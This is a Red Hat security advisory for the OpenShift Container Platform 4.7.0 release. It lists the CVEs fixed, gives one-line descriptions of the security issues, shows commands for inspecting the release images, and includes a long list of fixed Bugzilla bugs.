CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-6405 CVE-2020-7595 CVE-2020-7774
CVE-2020-8177 CVE-2020-8492 CVE-2020-8563
CVE-2020-8566 CVE-2020-8619 CVE-2020-8622
CVE-2020-8623 CVE-2020-8624 CVE-2020-8647
CVE-2020-8648 CVE-2020-8649 CVE-2020-9327
CVE-2020-9802 CVE-2020-9803 CVE-2020-9805
CVE-2020-9806 CVE-2020-9807 CVE-2020-9843
CVE-2020-9850 CVE-2020-9862 CVE-2020-9893
CVE-2020-9894 CVE-2020-9895 CVE-2020-9915
CVE-2020-9925 CVE-2020-10018 CVE-2020-10029
CVE-2020-10732 CVE-2020-10749 CVE-2020-10751
CVE-2020-10763 CVE-2020-10773 CVE-2020-10774
CVE-2020-10942 CVE-2020-11565 CVE-2020-11668
CVE-2020-11793 CVE-2020-12465 CVE-2020-12655
CVE-2020-12659 CVE-2020-12770 CVE-2020-12826
CVE-2020-13249 CVE-2020-13630 CVE-2020-13631
CVE-2020-13632 CVE-2020-14019 CVE-2020-14040
CVE-2020-14381 CVE-2020-14382 CVE-2020-14391
CVE-2020-14422 CVE-2020-15157 CVE-2020-15503
CVE-2020-15862 CVE-2020-15999 CVE-2020-16166
CVE-2020-24490 CVE-2020-24659 CVE-2020-25211
CVE-2020-25641 CVE-2020-25658 CVE-2020-25661
CVE-2020-25662 CVE-2020-25681 CVE-2020-25682
CVE-2020-25683 CVE-2020-25684 CVE-2020-25685
CVE-2020-25686 CVE-2020-25687 CVE-2020-25694
CVE-2020-25696 CVE-2020-26160 CVE-2020-27813
CVE-2020-27846 CVE-2020-28362 CVE-2020-29652
CVE-2021-2007 CVE-2021-3121
=====================================================================
1. Summary:
Red Hat OpenShift Container Platform release 4.7.0 is now available.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container
Platform 4.7.0. See the following advisory for the RPM packages for this
release:
https://access.redhat.com/errata/RHSA-2020:5634
Space precludes documenting all of the container images in this advisory.
See the following Release Notes documentation, which will be updated
shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
You may download the oc tool and use it to inspect release image metadata
as follows:
(For x86_64 architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64
The image digest is
sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70
(For s390x architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-s390x
The image digest is
sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d
(For ppc64le architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le
The image digest is
sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor.
Security Fix(es):
* crewjam/saml: authentication bypass in saml authentication
(CVE-2020-27846)
* golang: crypto/ssh: crafted authentication request can lead to nil
pointer dereference (CVE-2020-29652)
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index
validation (CVE-2021-3121)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* kubernetes: Secret leaks in kube-controller-manager when using vSphere
Provider (CVE-2020-8563)
* containernetworking/plugins: IPv6 router advertisements allow for MitM
attacks on IPv4 clusters (CVE-2020-10749)
* heketi: gluster-block volume password details available in logs
(CVE-2020-10763)
* golang.org/x/text: possibility to trigger an infinite loop in
encoding/unicode could lead to crash (CVE-2020-14040)
* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)
* golang-github-gorilla-websocket: integer overflow leads to denial of
service (CVE-2020-27813)
* golang: math/big: panic during recursive division of very large numbers
(CVE-2020-28362)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
For OpenShift Container Platform 4.7, see the following documentation,
which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html.
4. Bugs fixed (https://bugzilla.redhat.com/):
1620608 - Restoring deployment config with history leads to weird state
1752220 - [OVN] Network Policy fails to work when project label gets overwritten
1756096 - Local storage operator should implement must-gather spec
1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs
1768255 - installer reports 100% complete but failing components
1770017 - Init containers restart when the exited container is removed from node.
1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating
1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset
1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale
1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands
1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions
1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved"
1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor
1801089 - [OVN] Installation failed and monitoring pod not created due to some network error.
1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image
1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration
1806000 - CRI-O failing with: error reserving ctr name
1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1810438 - Installation logs are not gathered from OCP nodes
1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist
1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation
1813012 - EtcdDiscoveryDomain no longer needed
1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints
1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use
1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist
1819457 - Package Server is in 'Cannot update' status despite properly working
1820141 - [RFE] deploy qemu-quest-agent on the nodes
1822744 - OCS Installation CI test flaking
1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario
1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool
1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file
1829723 - User workload monitoring alerts fire out of the box
1832968 - oc adm catalog mirror does not mirror the index image itself
1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN
1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters
1834995 - olmFull suite always fails once th suite is run on the same cluster
1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz
1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4
1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks
1838751 - [oVirt][Tracker] Re-enable skipped network tests
1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups
1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed
1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP
1841119 - Get rid of config patches and pass flags directly to kcm
1841175 - When an Install Plan gets deleted, OLM does not create a new one
1841381 - Issue with memoryMB validation
1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option
1844727 - Etcd container leaves grep and lsof zombie processes
1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs
1847074 - Filter bar layout issues at some screen widths on search page
1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural
1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5
1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service
1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard
1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing
1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD
1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service
1853115 - the restriction of --cloud option should be shown in help text.
1853116 - `--to` option does not work with `--credentials-requests` flag.
1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854567 - "Installed Operators" list showing "duplicated" entries during installation
1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present
1855351 - Inconsistent Installer reactions to Ctrl-C during user input process
1855408 - OVN cluster unstable after running minimal scale test
1856351 - Build page should show metrics for when the build ran, not the last 30 minutes
1856354 - New APIServices missing from OpenAPI definitions
1857446 - ARO/Azure: excessive pod memory allocation causes node lockup
1857877 - Operator upgrades can delete existing CSV before completion
1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed
1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created
1860136 - default ingress does not propagate annotations to route object on update
1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed"
1860518 - unable to stop a crio pod
1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller
1862430 - LSO: PV creation lock should not be acquired in a loop
1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group.
1862608 - Virtual media does not work on hosts using BIOS, only UEFI
1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network
1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff
1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt
1866043 - Configurable table column headers can be illegible
1866087 - Examining agones helm chart resources results in "Oh no!"
1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info
1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement
1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity
1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help
1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed
1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations
1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x
1866482 - Few errors are seen when oc adm must-gather is run
1866605 - No metadata.generation set for build and buildconfig objects
1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name
1866901 - Deployment strategy for BMO allows multiple pods to run at the same time
1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure.
1867165 - Cannot assign static address to baremetal install bootstrap vm
1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig
1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS
1867477 - HPA monitoring cpu utilization fails for deployments which have init containers
1867518 - [oc] oc should not print so many goroutines when ANY command fails
1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster
1867965 - OpenShift Console Deployment Edit overwrites deployment yaml
1868004 - opm index add appears to produce image with wrong registry server binary
1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table"
1868104 - Baremetal actuator should not delete Machine objects
1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead
1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters
1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node
1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running
1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation
1868765 - [vsphere][ci] could not reserve an IP address: no available addresses
1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster
1868976 - Prometheus error opening query log file on EBS backed PVC
1869293 - The configmap name looks confusing in aide-ds pod logs
1869606 - crio's failing to delete a network namespace
1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes
1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance]
1870373 - Ingress Operator reports available when DNS fails to provision
1870467 - D/DC Part of Helm / Operator Backed should not have HPA
1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json
1870800 - [4.6] Managed Column not appearing on Pods Details page
1871170 - e2e tests are needed to validate the functionality of the etcdctl container
1872001 - EtcdDiscoveryDomain no longer needed
1872095 - content are expanded to the whole line when only one column in table on Resource Details page
1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console
1872128 - Can't run container with hostPort on ipv6 cluster
1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective
1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity
1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them
1872821 - [DOC] Typo in Ansible Operator Tutorial
1872907 - Fail to create CR from generated Helm Base Operator
1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page)
1873007 - [downstream] failed to read config when running the operator-sdk in the home path
1873030 - Subscriptions without any candidate operators should cause resolution to fail
1873043 - Bump to latest available 1.19.x k8s
1873114 - Nodes goes into NotReady state (VMware)
1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem
1873305 - Failed to power on /inspect node when using Redfish protocol
1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information
1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation
1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working
1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters
1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\\"/mount-point\\\") set in config.json failed: permission denied\""
1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver
1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider
1874240 - [vsphere] unable to deprovision - Runtime error list attached objects
1874248 - Include validation for vcenter host in the install-config
1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6
1874583 - apiserver tries and fails to log an event when shutting down
1874584 - add retry for etcd errors in kube-apiserver
1874638 - Missing logging for nbctl daemon
1874736 - [downstream] no version info for the helm-operator
1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution
1874968 - Accessibility: The project selection drop down is a keyboard trap
1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users
1875516 - disabled scheduling is easy to miss in node page of OCP console
1875598 - machine status is Running for a master node which has been terminated from the console
1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes.
1876166 - need to be able to disable kube-apiserver connectivity checks
1876469 - Invalid doc link on yaml template schema description
1876701 - podCount specDescriptor change doesn't take effect on operand details page
1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt
1876935 - AWS volume snapshot is not deleted after the cluster is destroyed
1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted
1877105 - add redfish to enabled_bios_interfaces
1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`
1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown
1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices'
1877681 - Manually created PV can not be used
1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53
1877740 - RHCOS unable to get ip address during first boot
1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5
1877919 - panic in multus-admission-controller
1877924 - Cannot set BIOS config using Redfish with Dell iDracs
1878022 - Met imagestreamimport error when import the whole image repository
1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated
1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status
1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM
1878766 - CPU consumption on nodes is higher than the CPU count of the node.
1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus.
1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image"
1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode
1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used
1878953 - RBAC error shows when normal user access pvc upload page
1878956 - `oc api-resources` does not include API version
1878972 - oc adm release mirror removes the architecture information
1879013 - [RFE]Improve CD-ROM interface selection
1879056 - UI should allow to change or unset the evictionStrategy
1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled
1879094 - RHCOS dhcp kernel parameters not working as expected
1879099 - Extra reboot during 4.5 -> 4.6 upgrade
1879244 - Error adding container to network "ipvlan-host-local": "master" field is required
1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder
1879282 - Update OLM references to point to the OLM's new doc site
1879283 - panic after nil pointer dereference in pkg/daemon/update.go
1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests
1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’
1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted.
1879565 - IPv6 installation fails on node-valid-hostname
1879777 - Overlapping, divergent openshift-machine-api namespace manifests
1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy
1879930 - Annotations shouldn't be removed during object reconciliation
1879976 - No other channel visible from console
1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc.
1880148 - dns daemonset rolls out slowly in large clusters
1880161 - Actuator Update calls should have fixed retry time
1880259 - additional network + OVN network installation failed
1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed"
1880410 - Convert Pipeline Visualization node to SVG
1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn
1880443 - broken machine pool management on OpenStack
1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s.
1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation
1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)
1880785 - CredentialsRequest missing description in `oc explain`
1880787 - No description for Provisioning CRD for `oc explain`
1880902 - need dnsPlocy set in crd ingresscontrollers
1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster
1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use
1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets
1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node
1881268 - Image uploading failed but wizard claim the source is available
1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration
1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup
1881881 - unable to specify target port manually resulting in application not reachable
1881898 - misalignment of sub-title in quick start headers
1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster
1882057 - Not able to select access modes for snapshot and clone
1882140 - No description for spec.kubeletConfig
1882176 - Master recovery instructions don't handle IP change well
1882191 - Installation fails against external resources which lack DNS Subject Alternative Name
1882209 - [ BateMetal IPI ] local coredns resolution not working
1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version"
1882268 - [e2e][automation]Add Integration Test for Snapshots
1882361 - Retrieve and expose the latest report for the cluster
1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use
1882556 - git:// protocol in origin tests is not currently proxied
1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4
1882608 - Spot instance not getting created on AzureGovCloud
1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance
1882649 - IPI installer labels all images it uploads into glance as qcow2
1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic
1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page
1882660 - Operators in a namespace should be installed together when approve one
1882667 - [ovn] br-ex Link not found when scale up RHEL worker
1882723 - [vsphere]Suggested mimimum value for providerspec not working
1882730 - z systems not reporting correct core count in recording rule
1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully
1882781 - nameserver= option to dracut creates extra NM connection profile
1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined
1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere
1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability
1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status
1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace
1883425 - Gather top installplans and their count
1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2
1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]
1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error
1883560 - operator-registry image needs clean up in /tmp
1883563 - Creating duplicate namespace from create namespace modal breaks the UI
1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful"
1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate
1883660 - e2e-metal-ipi CI job consistently failing on 4.4
1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests
1883766 - [e2e][automation] Adjust tests for UI changes
1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations
1883773 - opm alpha bundle build fails on win10 home
1883790 - revert "force cert rotation every couple days for development" in 4.7
1883803 - node pull secret feature is not working as expected
1883836 - Jenkins imagestream ubi8 and nodejs12 update
1883847 - The UI does not show checkbox for enable encryption at rest for OCS
1883853 - go list -m all does not work
1883905 - race condition in opm index add --overwrite-latest
1883946 - Understand why trident CSI pods are getting deleted by OCP
1884035 - Pods are illegally transitioning back to pending
1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace
1884131 - oauth-proxy repository should run tests
1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied
1884221 - IO becomes unhealthy due to a file change
1884258 - Node network alerts should work on ratio rather than absolute values
1884270 - Git clone does not support SCP-style ssh locations
1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout
1884435 - vsphere - loopback is randomly not being added to resolver
1884565 - oauth-proxy crashes on invalid usage
1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy
1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users
1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment
1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu.
1884632 - Adding BYOK disk encryption through DES
1884654 - Utilization of a VMI is not populated
1884655 - KeyError on self._existing_vifs[port_id]
1884664 - Operator install page shows "installing..." instead of going to install status page
1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac'
1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure
1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps
1884739 - Node process segfaulted
1884824 - Update baremetal-operator libraries to k8s 1.19
1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping
1885138 - Wrong detection of pending state in VM details
1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2
1885165 - NoRunningOvnMaster alert falsely triggered
1885170 - Nil pointer when verifying images
1885173 - [e2e][automation] Add test for next run configuration feature
1885179 - oc image append fails on push (uploading a new layer)
1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig
1885218 - [e2e][automation] Add virtctl to gating script
1885223 - Sync with upstream (fix panicking cluster-capacity binary)
1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2
1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2
1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2
1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2
1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI
1885315 - unit tests fail on slow disks
1885319 - Remove redundant use of group and kind of DataVolumeTemplate
1885343 - Console doesn't load in iOS Safari when using self-signed certificates
1885344 - 4.7 upgrade - dummy bug for 1880591
1885358 - add p&f configuration to protect openshift traffic
1885365 - MCO does not respect the install section of systemd files when enabling
1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating
1885398 - CSV with only Webhook conversion can't be installed
1885403 - Some OLM events hide the underlying errors
1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case
1885425 - opm index add cannot batch add multiple bundles that use skips
1885543 - node tuning operator builds and installs an unsigned RPM
1885644 - Panic output due to timeouts in openshift-apiserver
1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment
1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations
1885706 - Cypress: Fix 'link-name' accesibility violation
1885761 - DNS fails to resolve in some pods
1885856 - Missing registry v1 protocol usage metric on telemetry
1885864 - Stalld service crashed under the worker node
1885930 - [release 4.7] Collect ServiceAccount statistics
1885940 - kuryr/demo image ping not working
1886007 - upgrade test with service type load balancer will never work
1886022 - Move range allocations to CRD's
1886028 - [BM][IPI] Failed to delete node after scale down
1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas
1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd
1886154 - System roles are not present while trying to create new role binding through web console
1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm
1886168 - Remove Terminal Option for Windows Nodes
1886200 - greenwave / CVP is failing on bundle validations, cannot stage push
1886229 - Multipath support for RHCOS sysroot
1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage
1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status
1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL
1886397 - Move object-enum to console-shared
1886423 - New Affinities don't contain ID until saving
1886435 - Azure UPI uses deprecated command 'group deployment'
1886449 - p&f: add configuration to protect oauth server traffic
1886452 - layout options doesn't gets selected style on click i.e grey background
1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected
1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest
1886524 - Change default terminal command for Windows Pods
1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution
1886600 - panic: assignment to entry in nil map
1886620 - Application behind service load balancer with PDB is not disrupted
1886627 - Kube-apiserver pods restarting/reinitializing periodically
1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider
1886636 - Panic in machine-config-operator
1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer.
1886751 - Gather MachineConfigPools
1886766 - PVC dropdown has 'Persistent Volume' Label
1886834 - ovn-cert is mandatory in both master and node daemonsets
1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState
1886861 - ordered-values.yaml not honored if values.schema.json provided
1886871 - Neutron ports created for hostNetworking pods
1886890 - Overwrite jenkins-agent-base imagestream
1886900 - Cluster-version operator fills logs with "Manifest: ..." spew
1886922 - [sig-network] pods should successfully create sandboxes by getting pod
1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console
1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO
1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded
1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster
1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6
1887046 - Event for LSO need update to avoid confusion
1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image
1887375 - User should be able to specify volumeMode when creating pvc from web-console
1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console
1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval
1887428 - oauth-apiserver service should be monitored by prometheus
1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False"
1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data
1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes
1887465 - Deleted project is still referenced
1887472 - unable to edit application group for KSVC via gestures (shift+Drag)
